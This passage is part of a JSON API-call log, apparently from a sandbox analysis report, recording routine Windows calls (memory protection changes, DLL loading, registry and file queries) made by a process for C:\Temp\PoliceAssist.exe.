                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 383
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 384
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "GetKeyboardLayout",
            "status": true,
            "return": "0x04090409",
            "arguments": [
              {
                "name": "KeyboardLayout",
                "value": "0x00000409"
              },
              {
                "name": "LanguageName",
                "value": "English (United States)"
              }
            ],
            "repeated": 0,
            "id": 385
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 386
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee1878000"
              },
              {
                "name": "ModuleName",
                "value": "GDI32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 387
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtOpenKey",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000258"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00020019",
                "pretty_value": "KEY_READ"
              },
              {
                "name": "ObjectAttributesHandle",
                "value": "0x00000000"
              },
              {
                "name": "ObjectAttributesName",
                "value": "\\Registry\\MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
              },
              {
                "name": "ObjectAttributes",
                "value": "HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\SideBySide"
              }
            ],
            "repeated": 0,
            "id": 388
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "registry",
            "api": "NtQueryValueKey",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "KeyHandle",
                "value": "0x00000258"
              },
              {
                "name": "ValueName",
                "value": "PreferExternalManifest"
              },
              {
                "name": "FullName",
                "value": "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\SideBySide\\PreferExternalManifest"
              }
            ],
            "repeated": 0,
            "id": 389
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 390
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x001200a9",
                "pretty_value": "FILE_GENERIC_READ|FILE_GENERIC_EXECUTE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\uxtheme.dll.Config"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 391
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000258"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00120089",
                "pretty_value": "FILE_GENERIC_READ"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\uxtheme.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 392
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 393
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrLoadDll",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Flags",
                "value": "0x00000000"
              },
              {
                "name": "FileName",
                "value": "comctl32"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffecf5a0000"
              }
            ],
            "repeated": 0,
            "id": 394
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LoadLibraryExW",
            "status": true,
            "return": "0x7ffecf5a0000",
            "arguments": [
              {
                "name": "lpLibFileName",
                "value": "comctl32"
              },
              {
                "name": "dwFlags",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 395
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "process",
            "api": "NtUnmapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x00860000"
              },
              {
                "name": "RegionSize",
                "value": "0x00002000"
              }
            ],
            "repeated": 0,
            "id": 396
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000258"
              }
            ],
            "repeated": 0,
            "id": 397
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "HIMAGELIST_QueryInterface"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf61fa20"
              }
            ],
            "repeated": 0,
            "id": 398
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "DrawShadowText"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf69cfe0"
              }
            ],
            "repeated": 0,
            "id": 399
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "DrawSizeBox"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf62f780"
              }
            ],
            "repeated": 0,
            "id": 400
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "DrawScrollBar"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf610d20"
              }
            ],
            "repeated": 0,
            "id": 401
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "SizeBoxHwnd"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf6152d0"
              }
            ],
            "repeated": 0,
            "id": 402
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "ScrollBar_MouseMove"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf6921e0"
              }
            ],
            "repeated": 0,
            "id": 403
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "ScrollBar_Menu"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf691ff0"
              }
            ],
            "repeated": 0,
            "id": 404
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "HandleScrollCmd"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf691f50"
              }
            ],
            "repeated": 0,
            "id": 405
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "DetachScrollBars"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf5a2440"
              }
            ],
            "repeated": 0,
            "id": 406
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "AttachScrollBars"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf617150"
              }
            ],
            "repeated": 0,
            "id": 407
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "CCSetScrollInfo"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf612230"
              }
            ],
            "repeated": 0,
            "id": 408
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "CCGetScrollInfo"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf62bcc0"
              }
            ],
            "repeated": 0,
            "id": 409
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "CCEnableScrollBar"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf5a2830"
              }
            ],
            "repeated": 0,
            "id": 410
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "system",
            "api": "LdrGetProcedureAddressForCaller",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ModuleName",
                "value": "COMCTL32.dll"
              },
              {
                "name": "ModuleHandle",
                "value": "0x7ffecf5a0000"
              },
              {
                "name": "FunctionName",
                "value": "QuerySystemGestureStatus"
              },
              {
                "name": "Ordinal",
                "value": "0"
              },
              {
                "name": "FunctionAddress",
                "value": "0x7ffecf691fb0"
              }
            ],
            "repeated": 0,
            "id": 411
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x14001f23c",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "SystemParametersInfoW",
            "status": true,
            "return": "0x00000001",
            "arguments": [
              {
                "name": "Action",
                "value": "0x00000042"
              },
              {
                "name": "uiParam",
                "value": "0x00000010"
              }
            ],
            "repeated": 2,
            "id": 412
          },
          {
            "timestamp": "2025-11-20 10:58:26,125",
            "thread_id": "2188",
            "caller": "0x140056880",
            "parentcaller": "0x14001f39f",
            "category": "process",
            "api": "NtAllocateVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x05927000"
              },
              {
                "name": "RegionSize",
                "value": "0x00001000"
              },
              {
                "name": "Protection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 413
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f3c5",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "FindResourceExW",
            "status": true,
            "return": "0x1401313a0",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "Type",
                "value": "#9"
              },
              {
                "name": "Name",
                "value": "#212"
              },
              {
                "name": "Language",
                "value": "0x00000000"
              }
            ],
            "repeated": 0,
            "id": 414
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f3c5",
            "parentcaller": "0x140005850",
            "category": "misc",
            "api": "LoadResource",
            "status": true,
            "return": "0x140136120",
            "arguments": [
              {
                "name": "Module",
                "value": "0x140000000"
              },
              {
                "name": "ResourceInfo",
                "value": "0x1401313a0"
              }
            ],
            "repeated": 0,
            "id": 415
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "windows",
            "api": "FindWindowW",
            "status": true,
            "return": "0x00010098",
            "arguments": [
              {
                "name": "ClassName",
                "value": "Shell_TrayWnd"
              },
              {
                "name": "WindowName",
                "value": ""
              }
            ],
            "repeated": 0,
            "id": 416
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0x00000260"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00001000",
                "pretty_value": "PROCESS_QUERY_LIMITED_INFORMATION"
              },
              {
                "name": "ProcessIdentifier",
                "value": "3308"
              }
            ],
            "repeated": 0,
            "id": 417
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000260"
              }
            ],
            "repeated": 0,
            "id": 418
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a57000"
              },
              {
                "name": "ModuleName",
                "value": "SHELL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 419
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffee2a57000"
              },
              {
                "name": "ModuleName",
                "value": "SHELL32.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00001000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 420
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp\\PoliceAssist.exe"
              }
            ],
            "repeated": 0,
            "id": 421
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "FindFirstFileExW",
            "status": true,
            "return": "0x008acd80",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Temp"
              },
              {
                "name": "FirstCreateTimeLow",
                "value": "0x0c174eca"
              },
              {
                "name": "FirstCreateTimeHigh",
                "value": "0x01dc598a"
              }
            ],
            "repeated": 0,
            "id": 422
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "system",
            "api": "NtClose",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "Handle",
                "value": "0x00000260"
              }
            ],
            "repeated": 0,
            "id": 423
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtSetInformationProcess",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessInformationClass",
                "value": "93"
              },
              {
                "name": "ProcessInformation",
                "value": "\\x7f7\\x9e}"
              }
            ],
            "repeated": 0,
            "id": 424
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtOpenSection",
            "status": false,
            "return": "0xffffffffc0000034",
            "pretty_return": "OBJECT_NAME_NOT_FOUND",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000000"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d"
              },
              {
                "name": "ObjectAttributes",
                "value": "windows.storage.dll"
              }
            ],
            "repeated": 0,
            "id": 425
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "NtQueryAttributesFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\windows.storage.dll"
              }
            ],
            "repeated": 0,
            "id": 426
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "filesystem",
            "api": "NtOpenFile",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "FileHandle",
                "value": "0x00000260"
              },
              {
                "name": "DesiredAccess",
                "value": "0x00100021",
                "pretty_value": "FILE_READ_ACCESS|FILE_EXECUTE|SYNCHRONIZE"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\windows.storage.dll"
              },
              {
                "name": "ShareAccess",
                "value": "5",
                "pretty_value": "FILE_SHARE_READ|FILE_SHARE_DELETE"
              }
            ],
            "repeated": 0,
            "id": 427
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtCreateSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000264"
              },
              {
                "name": "DesiredAccess",
                "value": "0x0000000d",
                "pretty_value": "SECTION_QUERY|SECTION_MAP_READ|SECTION_MAP_EXECUTE"
              },
              {
                "name": "ObjectAttributes",
                "value": ""
              },
              {
                "name": "FileHandle",
                "value": "0x00000260"
              },
              {
                "name": "FileName",
                "value": "C:\\Windows\\System32\\windows.storage.dll"
              }
            ],
            "repeated": 0,
            "id": 428
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtMapViewOfSection",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "SectionHandle",
                "value": "0x00000264"
              },
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedec70000"
              },
              {
                "name": "SectionOffset",
                "value": "0x00000000"
              },
              {
                "name": "ViewSize",
                "value": "0x0079b000"
              },
              {
                "name": "Win32Protect",
                "value": "0x00000080",
                "pretty_value": "PAGE_EXECUTE_WRITECOPY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 429
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf3e5000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00003000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 430
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
            "api": "NtProtectVirtualMemory",
            "status": true,
            "return": "0x00000000",
            "arguments": [
              {
                "name": "ProcessHandle",
                "value": "0xffffffff"
              },
              {
                "name": "BaseAddress",
                "value": "0x7ffedf281000"
              },
              {
                "name": "ModuleName",
                "value": "windows.storage.dll"
              },
              {
                "name": "NumberOfBytesProtected",
                "value": "0x00002000"
              },
              {
                "name": "MemoryType",
                "value": "0x00000000"
              },
              {
                "name": "NewAccessProtection",
                "value": "0x00000004",
                "pretty_value": "PAGE_READWRITE"
              },
              {
                "name": "OldAccessProtection",
                "value": "0x00000002",
                "pretty_value": "PAGE_READONLY"
              },
              {
                "name": "StackPivoted",
                "value": "no"
              }
            ],
            "repeated": 0,
            "id": 431
          },
          {
            "timestamp": "2025-11-20 10:58:26,141",
            "thread_id": "2188",
            "caller": "0x14001f62e",
            "parentcaller": "0x14001f3e6",
            "category": "process",
